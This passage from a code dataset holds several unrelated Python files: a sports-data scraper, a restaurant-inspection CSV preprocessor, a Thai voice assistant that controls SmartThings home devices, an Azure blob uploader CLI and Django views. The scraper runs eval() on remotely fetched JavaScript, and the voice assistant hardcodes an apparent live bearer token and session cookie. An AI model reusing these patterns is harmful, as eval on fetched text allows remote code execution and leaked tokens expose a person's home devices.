html_string.lstrip('\\ufeff').strip().split('var')\n for dumps in dumps_list:\n dump = dumps.strip().rstrip(';')\n dump_list = dump.split('=', 1)\n if len(dump_list) < 2:\n continue\n # print(dump_list[0].strip(), dump_list[1].strip())\n data_dict[dump_list[0].strip()] = eval(dump_list[1].strip())\n return data_dict\n\n\nasync def get(key, value, semaphore):\n \"\"\"\n 定义一个异步get请求方法\n :param url:\n :param func:\n :return:\n \"\"\"\n async with semaphore:\n async with aiohttp.ClientSession() as session:\n async with session.get(url='http://bdata.7m.com.cn/analyse/gb/js/' + str(value) + '.js', headers=headers) as response:\n if str(response.status).startswith('2'):\n data_dict = analysis_html(await response.read())\n a_mn = data_dict.get('a_mn', '')\n a_mcl = data_dict.get('a_mcl', '')\n a_mid = data_dict.get('a_mid', '')\n return (key, {'Id': a_mid, 'Name': a_mn, 'ShortName': key, 'Color': a_mcl})\n return None\n\n\nasync def main(competition_name_dict):\n \"\"\"\n 定义一个异步的总调度方法\n :return:\n \"\"\"\n tasks = []\n semaphore = asyncio.Semaphore(500) # 限制并发量为500\n for key, value in competition_name_dict.items():\n task = asyncio.ensure_future(get(key, value, semaphore))\n tasks.append(task)\n dones, pendings = await asyncio.wait(tasks)\n dones_dict = dict([task.result() for task in dones if task.result()])\n return dones_dict\n\n\ndef get_b_competition(competition_name_dict):\n # 执行请求\n loop = asyncio.get_event_loop()\n task = asyncio.ensure_future(main(competition_name_dict))\n loop.run_until_complete(task)\n return task.result()\n\n\n\n","sub_path":"scrapy_7m/tool/basketball_tool/aio_b_competition.py","file_name":"aio_b_competition.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"519037489","text":"import io\nimport sys\nimport csv\nimport jsonschema\nimport json\nimport datetime\nimport logging\n\n\n# Util function for fixing case, python str.title() is not that 
good!\ndef titleCase(st):\n return ' '.join(''.join([w[0].upper(), w[1:].lower()]) for w in st.split())\n\n\n# See encoding note beow\ndef fixEncoding(st):\n return st.replace('Â', '')\n\n\n# Transform and convert the row into a form suitable for validation\n# Note two transforms being applied: titleCase and fixEncoding\n# The latter occurs in a field which is currently non-critical\n# So its a quick and dirty attempt at fixing - not ideal\n# as it looks like an upstream encoding problem that needs fixing\ndef map(row):\n logging.debug('Entering map(row)')\n return {\n \"camis\": int(row[0]),\n \"dba\": titleCase(row[1]),\n \"boro\": titleCase(row[2]),\n \"building\": titleCase(row[3]),\n \"street\": titleCase(row[4]),\n \"zipcode\": row[5],\n \"phone\": row[6],\n \"cuisine_description\": titleCase(row[7]),\n \"inspection_date\": row[8],\n \"action\": row[9],\n \"violation_code\": row[10],\n \"violation_description\": fixEncoding(row[11]),\n \"critical_flag\": row[12],\n \"score\": row[13],\n \"grade\": row[14],\n \"grade_date\": row[15],\n \"record_date\": row[16],\n \"inspection_type\": row[17]\n }\n\n\n# Use Json Schema to validate the payload\ndef get_schema_validator():\n logging.info('Entering validate(json_row)')\n with open('schema/restaurant.json') as schema_file:\n in_schema = json.load(schema_file)\n return jsonschema.Draft4Validator(in_schema)\n\n\nvalidator = get_schema_validator()\n\n\n# Check for any schema validation errors\n# note the schema is first pass only at present\ndef validate(json_row):\n logging.debug('Entering validate(json_row)')\n validation_errors = validator.iter_errors(json_row)\n valid = 1\n for schema_error in validation_errors:\n # We could log some output here but it could get too verbose\n valid = 0\n return valid\n\n\n# The core processing sequence for a row of CSV style data\ndef process(row):\n logging.debug('Entering process(row)')\n json_row = map(row) # Refactor: Schema driven mapping\n valid = validate(json_row)\n # 
We're going to do some downstream checks and filters based upon this\n json_row['valid'] = valid\n return json_row\n\n\ndef write(json_row, out_file):\n logging.debug('Entering write(json_row, out_file)')\n out_writer = csv.DictWriter(out_file, json_row.keys())\n out_writer.writerow(json_row)\n\n\n# Entry point. Takes an input CSV file and generates a validated\n# CSV output file with lineage metadata\n# Note a JSON output would be better, but the dowstream postgres\n# load step is tied to CSV\n# Other target backends would be better with JSON records.\n# Most bulk inserts require a proprietrary format however.\ndef processFile(in_file_name, out_file_name):\n logging.info('Entering processFile')\n load_timestamp = datetime.datetime.now()\n\n with io.open(in_file_name, 'r', encoding='utf8') as in_file:\n with io.open(out_file_name, 'w', encoding='utf8') as out_file:\n csv_reader = csv.reader(in_file, delimiter=',')\n next(csv_reader, None) # throw away the header\n line_no = 0\n for row in csv_reader:\n line_no += 1\n processed_row = process(row)\n # Include some lineage metadata\n processed_row['line_no'] = line_no\n processed_row['load_timestamp'] = load_timestamp\n write(processed_row, out_file)\n\n\nif __name__ == '__main__':\n processFile(sys.argv[1], sys.argv[2])\n","sub_path":"src/pre_process.py","file_name":"pre_process.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"531581118","text":"#!/usr/bin/python\n# -- coding: utf-8 --\n\n# Copyright (C) 2016 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR 
CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Sample that streams audio to the Google Cloud Speech API via GRPC.\"\"\"\n\nfrom __future__ import division\n\nimport contextlib\nimport functools\nimport re\nimport signal\nimport sys\n\n\nimport google.auth\nimport google.auth.transport.grpc\nimport google.auth.transport.requests\nfrom google.cloud.proto.speech.v1beta1 import cloud_speech_pb2\nfrom google.rpc import code_pb2\nimport grpc\nimport pyaudio\nfrom six.moves import queue\n\nimport requests\nimport json\nimport time\n\nimport logging\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nimport os.path\nimport uuid\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/\", MainHandler),\n (r\"/chatsocket\", ChatSocketHandler),\n ]\n settings = dict(\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n )\n super(Application, self).__init__(handlers, **settings)\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\", messages=ChatSocketHandler.cache)\n\nclass ChatSocketHandler(tornado.websocket.WebSocketHandler):\n waiters = set()\n cache = []\n cache_size = 200\n\n def get_compression_options(self):\n # Non-None enables compression with default options.\n return {}\n\n def open(self):\n ChatSocketHandler.waiters.add(self)\n\n def on_close(self):\n ChatSocketHandler.waiters.remove(self)\n\n @classmethod\n def update_cache(cls, chat):\n cls.cache.append(chat)\n if len(cls.cache) > cls.cache_size:\n cls.cache = 
cls.cache[-cls.cache_size:]\n\n @classmethod\n def send_updates(cls, chat):\n print(\"sending updates\")\n logging.info(\"sending message to %d waiters\", len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(chat)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def on_message(self, message):\n logging.info(\"got message %r\", message)\n parsed = tornado.escape.json_decode(message)\n chat = {\n \"id\": str(uuid.uuid4()),\n \"body\": parsed[\"body\"],\n }\n chat[\"html\"] = tornado.escape.to_basestring(\n self.render_string(\"message.html\", message=chat))\n\n ChatSocketHandler.update_cache(chat)\n ChatSocketHandler.send_updates(chat)\n\n# Audio recording parameters\nRATE = 16000\nCHUNK = int(RATE / 10) # 100ms\n\n# The Speech API has a streaming limit of 60 seconds of audio*, so keep the\n# connection alive for that long, plus some more to give the API time to figure\n# out the transcription.\n# * https://g.co/cloud/speech/limits#content\nDEADLINE_SECS = 60 * 3 + 5\nSPEECH_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'\n\ndef make_channel(host, port):\n \"\"\"Creates a secure channel with auth credentials from the environment.\"\"\"\n # Grab application default credentials from the environment\n credentials, _ = google.auth.default(scopes=[SPEECH_SCOPE])\n\n # Create a secure channel using the credentials.\n http_request = google.auth.transport.requests.Request()\n target = '{}:{}'.format(host, port)\n\n return google.auth.transport.grpc.secure_authorized_channel(\n credentials, http_request, target)\n\ndef _audio_data_generator(buff):\n \"\"\"A generator that yields all available data in the given buffer.\n\n Args:\n buff - a Queue object, where each element is a chunk of data.\n Yields:\n A chunk of data that is the aggregate of all chunks of data in `buff`.\n The function will block until at least one data chunk is available.\n \"\"\"\n stop = False\n while not stop:\n # Use a blocking get() to ensure 
there's at least one chunk of data.\n data = [buff.get()]\n\n # Now consume whatever other data's still buffered.\n while True:\n try:\n data.append(buff.get(block=False))\n except queue.Empty:\n break\n\n # `None` in the buffer signals that the audio stream is closed. Yield\n # the final bit of the buffer and exit the loop.\n if None in data:\n stop = True\n data.remove(None)\n\n yield b''.join(data)\n\ndef _fill_buffer(buff, in_data, frame_count, time_info, status_flags):\n \"\"\"Continuously collect data from the audio stream, into the buffer.\"\"\"\n buff.put(in_data)\n return None, pyaudio.paContinue\n\n# [START audio_stream]\n@contextlib.contextmanager\ndef record_audio(rate, chunk):\n \"\"\"Opens a recording stream in a context manager.\"\"\"\n # Create a thread-safe buffer of audio data\n buff = queue.Queue()\n\n audio_interface = pyaudio.PyAudio()\n audio_stream = audio_interface.open(\n format=pyaudio.paInt16,\n # The API currently only supports 1-channel (mono) audio\n # https://goo.gl/z757pE\n channels=1, rate=rate,\n input=True, frames_per_buffer=chunk,\n # Run the audio stream asynchronously to fill the buffer object.\n # This is necessary so that the input device's buffer doesn't overflow\n # while the calling thread makes network requests, etc.\n stream_callback=functools.partial(_fill_buffer, buff),\n )\n\n yield _audio_data_generator(buff)\n\n audio_stream.stop_stream()\n audio_stream.close()\n # Signal the _audio_data_generator to finish\n buff.put(None)\n audio_interface.terminate()\n# [END audio_stream]\n\ndef request_stream(data_stream, rate, interim_results=True):\n \"\"\"Yields `StreamingRecognizeRequest`s constructed from a recording audio\n stream.\n\n Args:\n data_stream: A generator that yields raw audio data to send.\n rate: The sampling rate in hertz.\n interim_results: Whether to return intermediate results, before the\n transcription is finalized.\n \"\"\"\n # The initial request must contain metadata about the stream, so the\n # 
server knows how to interpret it.\n recognition_config = cloud_speech_pb2.RecognitionConfig(\n # There are a bunch of config options you can specify. See\n # https://goo.gl/KPZn97 for the full list.\n encoding='LINEAR16', # raw 16-bit signed LE samples\n sample_rate=rate, # the rate in hertz\n # See http://g.co/cloud/speech/docs/languages\n # for a list of supported languages.\n language_code='th-TH', # a BCP-47 language tag\n # language_code='en-EN', # a BCP-47 language tag\n )\n streaming_config = cloud_speech_pb2.StreamingRecognitionConfig(\n interim_results=interim_results,\n config=recognition_config,\n )\n\n yield cloud_speech_pb2.StreamingRecognizeRequest(\n streaming_config=streaming_config)\n\n for data in data_stream:\n # Subsequent requests can all just have the content\n yield cloud_speech_pb2.StreamingRecognizeRequest(audio_content=data)\n\ndef listen_print_loop(recognize_stream):\n \"\"\"Iterates through server responses and prints them.\n\n The recognize_stream passed is a generator that will block until a response\n is provided by the server. When the transcription response comes, print it.\n\n In this case, responses are provided for interim results as well. If the\n response is an interim one, print a line feed at the end of it, to allow\n the next result to overwrite it, until the response is a final one. 
For the\n final one, print a newline to preserve the finalized transcription.\n \"\"\"\n num_chars_printed = 0\n try:\n for resp in recognize_stream:\n if resp.error.code != code_pb2.OK:\n raise RuntimeError('Server error: ' + resp.error.message)\n\n if not resp.results:\n continue\n\n # Display the top transcription\n result = resp.results[0]\n transcript = result.alternatives[0].transcript\n\n # Display interim results, but with a carriage return at the end of the\n # line, so subsequent lines will overwrite them.\n #\n # If the previous result was longer than this one, we need to print\n # some extra spaces to overwrite the previous result\n overwrite_chars = ' ' * max(0, num_chars_printed - len(transcript))\n if not result.is_final:\n sys.stdout.write(transcript + overwrite_chars + '\\r')\n sys.stdout.flush()\n\n num_chars_printed = len(transcript)\n print(transcript)\n else:\n print(transcript + overwrite_chars)\n\n # Exit recognition if any of the transcribed phrases could be\n # one of our keywords.\n if re.search(r'\\b(exit|quit)\\b', transcript, re.I):\n print('Exiting..')\n break\n elif re.search(r'\\b(ออก)\\b', transcript, re.I):\n print('Exiting..')\n break\n # elif transcript == u'ออโต้ เปิดไฟ ' or transcript == u'เอาโต เปิดไฟ ' or transcript == u'oppo เปิดไฟ ' \\\n # or transcript == u'auto เปิดไฟ ' or transcript == u' auto เปิดไฟ ' or transcript == u' oppo เปิดไฟ ':\n # print('turning on light')\n # elif transcript == u'ออโต้ ช่วยด้วย ' or transcript == u'เอาโต ช่วยด้วย ' or transcript == u'oppo ช่วยด้วย ' \\\n # or transcript == u'auto ช่วยด้วย ' or transcript == u' auto ช่วยด้วย ' or transcript == u'เอาตัวช่วยด้วย ' \\\n # or transcript == u'auto ชื่อด้วย ' or transcript == u'auto ชื่อด้วย ' or transcript == u' oppo ช่วยด้วย ':\n # print(u'พร้อมมาช่วยแล้วครับ')\n # elif transcript == u'ออโต้ เรียกตำรวจ ' or transcript == u'เอาโต เรียกตำรวจ ' or transcript == u'oppo เรียกตำรวจ ' \\\n # or transcript == u'auto เรียกตำรวจ ' or transcript == u' auto 
เรียกตำรวจ ' or transcript == u'เอาตัวเรียกตำรวจ ' \\\n # or transcript == u'auto เรียนตำรวจ ' or transcript == u'auto ตำรวจ ' or transcript == u'ขอโทษตำรวจ ' \\\n # or transcript == u'เอาตูดตำรวจ ' or transcript == u' auto ตำรวจ ' or transcript == u'auto ตำรวจ ':\n # print(u'ตำรวจอยู่ระหว่างทางกำลังมา')\n # elif transcript == u'ออโต้ โรงพยาบาล ' or transcript == u'อัลโตโรงพยาบาล ' or transcript == u'oppo โรงพยาบาล ' \\\n # or transcript == u'auto โรงพยาบาล ' or transcript == u' auto โรงพยาบาล ' or transcript == u'เอาตัวโรงพยาบาล ' \\\n # or transcript == u'เอาตูดโรงพยาบาล ' or transcript == u'also โรงพยาบาล ':\n # print(u'โรงพยาบาลกำลังมาช่วยเหลือครับ ')\n # elif transcript == u'ออโต้ เปิดแอร์ ' or transcript == u'เอาโต เปิดแอร์ ' or transcript == u'oppo เปิดแอร์ ' \\\n # or transcript == u'auto เปิดแอร์ ' or transcript == u' auto เปิดแอร์ ' or transcript == u'อัลโต้เปิดแอร์ ':\n # print('turning on AC')\n # elif transcript == u'ออโต้ ไฟใหม้ ' or transcript == u'เอาโต ไฟไหม้ ' or transcript == u'oppo ไฟไหม้' \\\n # or transcript == u'auto ไฟไหม้ ' or transcript == u' auto ไฟไหม้ ' or transcript == u'รถตู้ไฟไหม้ '\\\n # or transcript == u'oppo find ��ม่ ' or transcript == u'เอาตู้ไฟไหม้ ':\n # print('ตำรวจดับเพลิงกำลังมาครับ')\n # elif transcript == u'ออโต้ เปิดทีวี ' or transcript == u'เอาโต เปิดทีวี ' or transcript == u'oppo เปิดทีวี ' \\\n # or transcript == u'auto เปิดทีวี ' or transcript == u' auto เปิดทีวี ':\n # print('turning on TV')\n\n elif u'เปิดไฟ' in transcript:\n turn_on_light()\n print('turning on light')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการเปิดไฟให้แล้วค่ะ ')\n elif u'ปิดไฟ' in transcript:\n turn_off_light()\n print('turning off light')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการปิดไฟให้แล้วค่ะ ')\n elif u'ช่วยด้วย' in transcript:\n print(u'พร้อมมาช่วยแล้วครับ')\n text_to_speech(u'อัลโต้ได้ส่งข้อความและโทรเรียกคนในบ้านให้แล้วค่ะ ')\n elif u'เรียกตำรวจ' in transcript or u'ตำรวจ' in transcript:\n 
print(u'ตำรวจอยู่ระหว่างทางกำลังมา')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้เรียกตำรวจให้แล้วนะค่ะ อยู่ระหว่างทางค่ะ ')\n elif u'โรงพยาบาล' in transcript:\n print(u'โรงพยาบาลกำลังมาช่วยเหลือครับ')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้เรียกรถพยาบาลให้แล้วนะค่ะ อยู่ระหว่างทางค่ะ ')\n elif u'เปิดแอร์' in transcript:\n turn_on_ac()\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการเปิดแอร์ให้แล้วค่ะ รอสักพักนะค่ะ ')\n print('turning on AC')\n elif u'ปิดแอร์' in transcript:\n turn_off_ac()\n print('turning off AC')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการปิดแอร์ให้แล้วค่ะ สบายใจได้หายห่วง ')\n elif u'ไฟไหม้' in transcript:\n print('ตำรวจดับเพลิงกำลังมาครับ')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้เรียกรถดับเพลิงให้อย่างเร่งด่วนแล้วค่ะ รอสักแป๊ปนะค่ะ ')\n elif u'เปิดทีวี' in transcript:\n turn_on_tv()\n print('turning on TV')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการเปิดทีวีให้แล้วค่ะ คอยติดตามชมนะค่ะ ')\n elif u'ปิดทีวี' in transcript:\n turn_off_tv()\n print('turning off TV')\n time.sleep(2)\n text_to_speech(u'อัลโต้ได้ทำการปิดทีวีให้แล้วค่ะ คอยติดตามชมนะค่ะ ')\n elif u'ออก' in transcript:\n print('Exiting..')\n break\n else:\n print(\"text not matched transcript\")\n print(transcript)\n\n num_chars_printed = 0\n except:\n print(\"error in listen_print_loop\")\n\ndef turn_on_ac():\n # My API\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\n print(\"sending turning on AC command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"on\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n 
status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_off_ac():\n # My API\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\n print(\"sending turning off AC command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/9b86fd56-4de8-4b1d-b2de-98c3f5243e27\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"off\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_on_light():\n # front lifx\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\n print(\"sending turning on Light command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"on\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_off_light():\n # front lifx\n 
# PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\n print(\"sending turning off Light command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/08e75403-af24-4dcf-b1d6-ce253008858a\",\n headers={\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"off\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_on_tv():\n # TV\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\n print(\"sending turning on TV command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\",\n headers={\n \"Cookie\": \"JSESSIONID=FCCFD41E2393191D2AA158F251B09CDF-n2\",\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"on\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef turn_off_tv():\n # TV\n # PUT https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\n print(\"sending turning off TV 
command\")\n try:\n response = requests.put(\n url=\"https://graph.api.smartthings.com/api/smartapps/installations/a0304624-dc42-4d93-b84f-421ff52167ca/switches/b64f5e3a-d447-48f8-8d86-050de41cec7a\",\n headers={\n \"Cookie\": \"JSESSIONID=FCCFD41E2393191D2AA158F251B09CDF-n2\",\n \"Authorization\": \"Bearer 9e450b2e-3acf-4494-8183-c01806684bd2\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n },\n data=json.dumps({\n \"command\": \"off\"\n })\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef text_to_speech(msg):\n # Request (4)\n # POST http://localhost:8888/test\n\n try:\n response = requests.get(\n url=\"http://localhost:8080/websocket\",\n # headers={\n # \"Cookie\": \"_xsrf=2|944ae2e2|73e716843e1dd25abd7365e04aec06e7|1490541278\",\n # \"Content-Type\": \"application/x-www-form-urlencoded; charset=utf-8\",\n # },\n # data={\n # \"message\": msg,\n # },\n )\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n\ndef main():\n service = cloud_speech_pb2.SpeechStub(\n make_channel('speech.googleapis.com', 443))\n\n # For streaming audio from the microphone, there are three threads.\n # First, a thread that collects audio data as it comes in\n with record_audio(RATE, CHUNK) as buffered_audio_data:\n # Second, a thread that sends requests with that data\n requests = request_stream(buffered_audio_data, RATE)\n # Third, a thread that listens for transcription responses\n recognize_stream = service.StreamingRecognize(\n requests, DEADLINE_SECS)\n\n # Exit things cleanly on interrupt\n signal.signal(signal.SIGINT, lambda *_: 
recognize_stream.cancel())\n\n # Now, put the transcription responses to use.\n try:\n listen_print_loop(recognize_stream)\n recognize_stream.cancel()\n except grpc.RpcError as e:\n code = e.code()\n # CANCELLED is caused by the interrupt handler, which is expected.\n if code is not code.CANCELLED:\n raise\n\n # tornado.options.parse_command_line()\n # app = Application()\n # app.listen(options.port)\n # tornado.ioloop.IOLoop.current().start()\n\nif __name__ == '__main__':\n main()\n","sub_path":"speech/grpc/transcribe_streaming.py","file_name":"transcribe_streaming.py","file_ext":"py","file_size_in_byte":26098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517882255","text":"\"\"\"\n * PyAzBlob 1.0.0 Python Azure Blob Service Bulk Uploader\n * https://github.com/RobertoPrevato/PyAzBlob\n *\n * Copyright 2017, Roberto Prevato\n * https://robertoprevato.github.io\n *\n * Licensed under the MIT license:\n * http://www.opensource.org/licenses/MIT\n\"\"\"\nimport sys\nis_less_than_34 = sys.version_info <= (3, 4)\n\nseparator = \"===========================================================\\n\"\n\nbanner = \"\"\"\n===========================================================\n _____ ____ _ _ \n | __ \\ /\\ | _ \\| | | | \n | |__) | _ / \\ ___| |_) | | ___ | |__ \n | ___/ | | | / /\\ \\ |_ / _ <| |/ _ \\| '_ \\ \n | | | |_| |/ ____ \\ / /| |_) | | (_) | |_) | \n |_| \\__, /_/ \\_\\/___|____/|_|\\___/|_.__/ \n __/ | \n |___/ \n \n PyAzBlob | Azure Blob Service Bulk Uploader. 
\n Written by Roberto Prevato \n \n===========================================================\"\"\"\n\n\ndef sep_print(message):\n print(\"[*]\")\n print(\"[*] \" + message)\n print(\"[*]\")\n\nif is_less_than_34:\n print(banner)\n sep_print(\"PyAzBlob requires Python 3.4 or greater\")\n sys.exit(1)\n\nimport argparse\nfrom core.exceptions import ArgumentNullException, InvalidArgument, MissingDependency, ConfigurationError\n\n\nparser = argparse.ArgumentParser(description=\"PyAzBlob | Azure Blob Service Bulk Uploader\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"{}\\n{}\".format(\"author: Roberto Prevato roberto.prevato@gmail.com\", separator))\n\nparser.add_argument(\"-p\", \"--path\", dest=\"root_path\", required=True,\n help=\"path from which to start uploading files\")\n\nparser.add_argument(\"-c\", \"--cut\", dest=\"cut_path\", required=False,\n help=\"portion of root path to cut from uploaded blobs\")\n\nparser.add_argument(\"-i\", \"--ignore\", dest=\"ignoredpath\", required=False, nargs=\"+\",\n help=\"ignored paths (Unix style, globs)\", default=[])\n\nparser.add_argument(\"-r\", \"--recurse\", dest=\"recurse\", required=False, action=\"store_true\", default=False,\n help=\"whether to do recursive upload of subfolders and files.\")\n\nparser.add_argument(\"-f\", \"--force\", dest=\"force\", required=False, action=\"store_true\", default=False,\n help=\"whether to force re-upload of files that were uploaded in a previous run (from files.log).\")\n\nparser.add_argument(\"-s\", \"--sleep\", dest=\"sleep\", required=False, default=-1,\n help=\"sleep time in milliseconds, between uploads (default no sleep)\")\n\nparser.add_argument(\"--nobanner\", dest=\"nobanner\", required=False, action=\"store_true\", default=False,\n help=\"whether to disable the banner with ascii art.\")\n\noptions = parser.parse_args()\n\n\nif __name__ == \"__main__\":\n if not options.nobanner:\n print(banner)\n try:\n from core.pyazblobcore import 
pyazupload_entry\n\n pyazupload_entry(options.root_path,\n options.cut_path,\n options.ignoredpath,\n options.recurse,\n options.force,\n options.sleep)\n\n except MissingDependency as mde:\n sep_print(str(mde))\n sys.exit(1)\n\n except ConfigurationError as ce:\n sep_print(\"Configuration Error: \" + str(ce))\n sys.exit(1)\n\n except (ArgumentNullException, InvalidArgument) as handled_exception:\n sep_print(\"Error: \" + str(handled_exception))\n\n except RuntimeError as re:\n sep_print(\"Runtime Error: \" + str(re))\n\n except KeyboardInterrupt:\n sep_print(\"User interrupted...\")\n","sub_path":"pyazblob.py","file_name":"pyazblob.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"2814326","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import *\n\ndef index(request):\n context = {\n 'courses': Course.objects.all()\n }\n return render(request, 'index.html', context)\n\ndef create_course(request):\n errors = Course.objects.course_validate(request.POST)\n if errors:\n for key, value in errors.items():\n messages.error(request, value)\n else:\n course = Course.objects.create(\n name = request.POST['name']\n )\n desc = Description.objects.create(desc_content=request.POST['desc_content'])\n course.description = desc\n course.save()\n\n return redirect('/')\n\ndef comments_page(request, id):\n context = {\n 'course': Course.objects.get(id=id)\n }\n return render(request, 'comments.html', context)\n\ndef create_comment(request, id):\n errors = Comment.objects.comment_validate(request.POST)\n if errors:\n for key, value in errors.items():\n messages.error(request, value)\n else:\n Comment.objects.create(\n comm_content = request.POST['comm_content'],\n course = Course.objects.get(id=id)\n )\n return redirect(f'/comments/{id}')\n\ndef delete_alert(request, id):\n course = Course.objects.get(id=id)\n context = {\n 
